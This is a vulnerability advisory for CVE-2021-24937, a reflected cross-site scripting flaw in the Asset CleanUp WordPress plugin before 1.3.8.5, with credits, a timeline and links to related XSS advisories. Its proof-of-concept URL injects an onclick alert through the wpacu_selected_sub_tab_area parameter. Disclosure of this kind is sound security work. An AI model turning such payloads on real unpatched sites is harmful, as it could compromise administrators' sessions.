Asset CleanUp < 1.3.8.5 – Reflected Cross-Site Scripting | CVE 2021-24937 | Plugin Vulnerabilities

Description

The plugin does not escape the wpacu_selected_sub_tab_area parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://exampe.com/wp-admin/admin.php?page=wpassetcleanup_settings&wpacu_selected_sub_tab_area=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22

Affects Plugins

wp-asset-clean-up

Fixed in 1.3.8.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

dde3c119-dad9-4205-a931-d49bbf3b6b87

Timeline

Publicly Published

2022-01-03 (about 2 years ago)

Added

2022-01-03 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2023-11-20

Title

wpForo Forum < 2.2.4 - Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2020-05-28

Title

bbPress < 2.6.5 - Authenticated Stored Cross-Site Scripting via the forums list table

Published

2023-04-25

Title

Arya Multipurpose <= 1.0.5 - Unauthenticated Reflected XSS

Published

2022-05-16

Title

FiboSearch < 1.18.0 - Admin+ Stored Cross-Site Scripting

Published

2023-11-13

Title

Star CloudPRNT for WooCommerce < 2.0.4 - Reflected XSS